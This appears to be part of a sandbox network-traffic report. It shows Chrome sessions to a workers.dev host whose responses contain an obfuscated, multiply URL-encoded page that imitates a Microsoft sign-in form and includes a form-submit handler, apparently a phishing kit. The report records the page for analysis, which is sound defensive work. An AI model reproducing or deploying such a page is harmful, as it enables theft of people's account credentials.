                                  Data Ascii: 2520%2520%253Cimg%2520src%253D%2522https%253A//aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg%2522%2520alt%253D%2522%2522%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253Cp%253ESign-in%2520option%253C/
                                  2024-04-17 23:13:26 UTC1369INData Raw: 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 63 6f 6e 73 74 25 32 35 32 30 6e 6f 61 63 63 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 35 32 38 25 32 35 32 37 2e 6e 6f 61 63 63 63 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 63 6f 6e 73 74 25 32 35 32 30 63 72 65 61 74 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 35 32 38 25 32 35 32 37 2e 63 72 65 61 74 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32
                                  Data Ascii: 2529%250A%2520%2520%2520%2520%2520%2520const%2520noacc%2520%253D%2520document.querySelector%2528%2527.noaccc%2527%2529%250A%2520%2520%2520%2520%2520%2520const%2520creat%2520%253D%2520document.querySelector%2528%2527.creat%2527%2529%250A%2520%2520%2520%252
                                  2024-04-17 23:13:26 UTC1369INData Raw: 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 25 32 35 32 37 6e 6f 6e 65 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 41 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 25 32 35 32 37 62 6c 6f 63 6b 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 41 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 35 32 30 25 32 35 33 44
                                  Data Ascii: %2520%2520%2520%2520%2520%2520%2520%2520butt.style.display%2520%253D%2520%2527none%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520buttA.style.display%2520%253D%2520%2527block%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520buttA.style.opacity%2520%253D
                                  2024-04-17 23:13:26 UTC1369INData Raw: 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 30 41 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 66 6f 72 6d 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 25 32 35 32 38 25 32 35 32 32 73 75 62 6d 69 74 25 32 35 32 32 25 32 35 32 43 25 32 35 32 30 65 25 32 35 32 30 25 32 35 33 44 25 32 35 33 45 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 25 32 35 32 38 25 32 35 32 39 25 32 35 33 42 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30
                                  Data Ascii: %2520%2520%2520%2520%2520%250A%250A%250A%2520%2520%2520%2520%2520%2520forma.addEventListener%2528%2522submit%2522%252C%2520e%2520%253D%253E%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520e.preventDefault%2528%2529%253B%250A%250A%2520%2520%2520


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  15192.168.2.449762104.21.235.1824433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:27 UTC627OUTGET /q/Screen-Shot-2022-01-30-at-10.27.21-PM.png HTTP/1.1
                                  Host: www.linkpicture.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://nsjw.newf.workers.dev/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:13:27 UTC638INHTTP/1.1 404 Not Found
                                  Date: Wed, 17 Apr 2024 23:13:27 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  vary: Accept-Encoding
                                  x-turbo-charged-by: LiteSpeed
                                  Cache-Control: max-age=31536000
                                  CF-Cache-Status: HIT
                                  Age: 947389
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a0y9wf02%2B0sMuQfKjzUbPKI%2BE4ejHAzTfitHdf%2BZQDimsDIjJSC5cI1k%2F1id0BHYMYhjCyTk5fLErWgLQATFNZ1BWKz3SvDJ6Ze93MlwdjCXGcRS0TXfM5y9HbDaK%2BKtFkQvI9Uk"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 87601b111aaa453e-ATL
                                  2024-04-17 23:13:27 UTC731INData Raw: 32 36 35 39 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d
                                  Data Ascii: 2659<!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=utf-8"><meta http-equiv="Cache-control" content="no-cache"><meta http-equiv="Pragma" content="no-cache"><meta http-equiv="Expires" content="0"><meta nam
                                  2024-04-17 23:13:27 UTC1369INData Raw: 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20
                                  Data Ascii: } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%;
                                  2024-04-17 23:13:27 UTC1369INData Raw: 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20
                                  Data Ascii: text-align: center; } .additional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left;
                                  2024-04-17 23:13:27 UTC1369INData Raw: 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20
                                  Data Ascii: ont-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left;
                                  2024-04-17 23:13:27 UTC1369INData Raw: 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f 56 6b 67 4b 58 47 6b 77 59 55 51 48 41 61 4d 2b 79 51 75 6e 42 6d 4e 53 77 62 52 56 59 68 2b 6b 4f 63 67 4d 68 76 52 44 42 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33
                                  Data Ascii: obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3
                                  2024-04-17 23:13:27 UTC1369INData Raw: 6c 64 76 7a 53 54 4b 77 32 66 71 48 53 47 4d 35 68 42 57 31 49 55 49 30 66 2f 4c 64 4f 4e 74 45 55 4b 58 47 43 39 35 6a 4b 2b 52 67 34 51 42 56 77 4e 6d 6c 65 50 5a 56 6a 54 78 75 6f 32 34 6b 57 4d 72 51 48 67 2f 6e 5a 7a 78 44 71 6d 71 46 52 46 43 37 39 39 2b 64 62 45 69 72 4d 6f 56 45 58 68 56 41 30 37 59 2b 47 57 4e 4d 4f 42 43 78 49 49 70 43 67 43 70 41 58 35 4b 67 48 42 36 49 51 49 4c 48 77 45 33 48 58 6b 32 58 51 56 73 7a 64 53 6b 47 45 43 6a 55 41 42 68 50 4c 4d 64 54 2f 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72 56 30 52 49 71 2f 36 2b 42 49 50 50
                                  Data Ascii: ldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPP
                                  2024-04-17 23:13:27 UTC1369INData Raw: 59 4a 47 47 63 74 52 44 43 31 46 73 47 61 51 33 52 74 47 46 66 4c 34 6f 73 33 34 67 36 54 2b 41 6b 41 54 38 34 62 73 30 66 58 32 77 65 53 38 38 58 37 58 36 68 58 52 44 44 52 7a 64 77 48 5a 2f 35 44 32 68 6a 6a 67 68 74 33 4d 62 35 79 31 4e 49 4e 71 2b 62 65 5a 42 75 38 64 38 34 36 35 37 77 50 59 66 4e 38 70 5a 42 63 30 67 2b 4a 4b 69 4b 59 69 4e 72 39 72 34 76 31 5a 72 76 64 62 74 61 7a 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54 54 74 39 47 51 41 36 68 2b 64 2f 31 64 45 35 41 6e 39 47 52 48 35 6f 35 6d 77 49 67 4b 48 76 68 43 42 69 35 6a 36 30 42 63 69 38
                                  Data Ascii: YJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5y1NINq+beZBu8d84657wPYfN8pZBc0g+JKiKYiNr9r4v1Zrvdbtazp16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8
                                  2024-04-17 23:13:27 UTC880INData Raw: 65 63 74 69 6f 6e 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 72 65 61 73 6f 6e 2d 74 65 78 74 22 3e 54 68 65 20 73 65 72 76 65 72 20 63 61 6e 6e 6f 74 20 66 69 6e 64 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 70 61 67 65 3a 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 65 72 5f 6d 69 73 63 6f 6e 66 69 67 75 72 65 64 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 69 6d 61 67 65 22 20 2f 3e
                                  Data Ascii: ection><p class="reason-text">The server cannot find the requested page:</p></div><section class="additional-info"><div class="container"><div class="additional-info-items"><ul><li><img src="/img-sys/server_misconfigured.png" class="info-image" />
                                  2024-04-17 23:13:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  16192.168.2.449763104.21.50.1034433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:27 UTC598OUTGET /favicon.ico HTTP/1.1
                                  Host: nsjw.newf.workers.dev
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://nsjw.newf.workers.dev/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:13:27 UTC554INHTTP/1.1 200 OK
                                  Date: Wed, 17 Apr 2024 23:13:27 GMT
                                  Content-Type: text/html;charset=UTF-8
                                  Content-Length: 13452
                                  Connection: close
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3t2i3cmB3woYfSl6wGcP0bkPYz8XDLXSJyLr%2FmuFjH%2BRzR0Iak5dzdiYVqkcdrha6Kb9WvL0yLUfoN3SuC6GNSHnH%2F3sIZrglCyNsBgQqEuot%2B8FqwUh7yIyc9EHKvfzYCQ%2BVc8Ka1c%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 87601b143c6cad74-ATL
                                  alt-svc: h3=":443"; ma=86400
                                  2024-04-17 23:13:27 UTC815INData Raw: 0a 20 20 20 3c 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 25 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 30 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 68 65 61 64 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 6d 65 74 61 25 32 35 32 30 63 68 61 72 73 65 74 25 32 35 33 44 25 32 35 32 32 75 74 66 2d 38 25 32 35 32 32 25 32 35 33 45 25 32 35 30
                                  Data Ascii: <<script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253C%2521DOCTYPE%2520html%253E%250A%253Chtml%253E%250A%2520%2520%253Chead%253E%250A%2520%2520%2520%2520%253Cmeta%2520charset%253D%2522utf-8%2522%253E%250
                                  2024-04-17 23:13:27 UTC1369INData Raw: 32 39 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 70 61 64 64 69 6e 67 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 6d 61 72 67 69 6e 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 25 32 35 33 41 25 32 35 32 30 63 6f 76 65 72 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6f 6e 74 2d 66 61 6d 69 6c 79 25 32 35 33 41 25 32 35 32 30 41 72 69 61 6c 25 32 35 32 43 25 32 35 32 30 48 65 6c 76 65 74 69 63 61 25 32 35 32 43 25 32 35 32 30 73 61 6e 73 2d 73 65 72 69 66 25 32 35 33 42 25 32 35 30 41 25 32 35 37 44 25 32 35 30 41 25 32 35 30 41 2e 66 6f 72 6d 61 6c 25 32 35 32 30 69 6e 70 75 74 25
                                  Data Ascii: 29%253B%250A%2520%2520padding%253A%25200%253B%250A%2520%2520margin%253A%25200%253B%250A%2520%2520background-size%253A%2520cover%253B%250A%2520%2520font-family%253A%2520Arial%252C%2520Helvetica%252C%2520sans-serif%253B%250A%257D%250A%250A.formal%2520input%
                                  2024-04-17 23:13:27 UTC1369INData Raw: 32 35 30 41 25 32 35 32 30 25 32 35 32 30 70 61 64 64 69 6e 67 25 32 35 33 41 25 32 35 32 30 31 30 70 78 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 62 6f 72 64 65 72 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 77 69 64 74 68 25 32 35 33 41 25 32 35 32 30 34 38 25 32 35 32 35 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6c 6f 61 74 25 32 35 33 41 25 32 35 32 30 72 69 67 68 74 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6f 6e 74 2d 77 65 69 67 68 74 25 32 35 33 41 25 32 35 32 30 62 6f 6c 64 25 32 35 33 42 25 32 35 30 41 25 32 35 37 44 25 32 35 30 41 2e 62 75 74 74 6f 6e 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 64 69 73 70 6c 61
                                  Data Ascii: 250A%2520%2520padding%253A%252010px%253B%250A%2520%2520border%253A%2520none%253B%250A%2520%2520width%253A%252048%2525%253B%250A%2520%2520float%253A%2520right%253B%250A%2520%2520font-weight%253A%2520bold%253B%250A%257D%250A.button%257B%250A%2520%2520displa
                                  2024-04-17 23:13:27 UTC1369INData Raw: 32 30 25 32 35 32 30 64 69 73 70 6c 61 79 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 6f 70 61 63 69 74 79 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 37 44 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 33 7a 69 70 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 64 69 73 70 6c 61 79 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65
                                  Data Ascii: 20%2520display%253A%2520none%253B%250A%2520%2520%2520%2520%2520%2520%2520%2520opacity%253A%25200%253B%250A%2520%2520%2520%2520%2520%2520%257D%250A%2520%2520%2520%2520%2520%2520%2523zip%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520display%253A%2520none
                                  2024-04-17 23:13:27 UTC1369INData Raw: 33 44 25 32 35 32 32 66 6f 72 6d 61 6c 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 69 6d 67 25 32 35 32 30 73 72 63 25 32 35 33 44 25 32 35 32 32 68 74 74 70 73 25 32 35 33 41 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 6d 69 63 72 6f 73 6f 66 74 5f 6c 6f 67 6f 5f 65 65 35 63 38 64 39 66 62 36 32 34 38 63 39 33 38 66 64 30 64 63 31 39 33 37 30 65 39 30 62 64 2e 73 76 67 25 32 35 32 32 25 32 35 32 30 61 6c 74 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25
                                  Data Ascii: 3D%2522formal%2522%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253Cimg%2520src%253D%2522https%253A//aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg%2522%2520alt%253D%2522%2522%253E%250A%250A%2520%2520%
                                  2024-04-17 23:13:27 UTC1369INData Raw: 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 61 25 32 35 32 30 68 72 65 66 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 32 30 63 6c 61 73 73 25 32 35 33 44 25 32 35 32 32 63 72 65 61 74 25 32 35 32 32 25 32 35 33 45 43 72 65 61 74 65 25 32 35 32 30 6f 6e 65 25 32 35 32 31 25 32 35 33 43 2f 61 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 2f 64 69 76 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32
                                  Data Ascii: E%250A%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%253Ca%2520href%253D%2522%2522%2520class%253D%2522creat%2522%253ECreate%2520one%2521%253C/a%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253C/div%253E%250A%2520%2520%2520%2520%2520%2520%2520%252
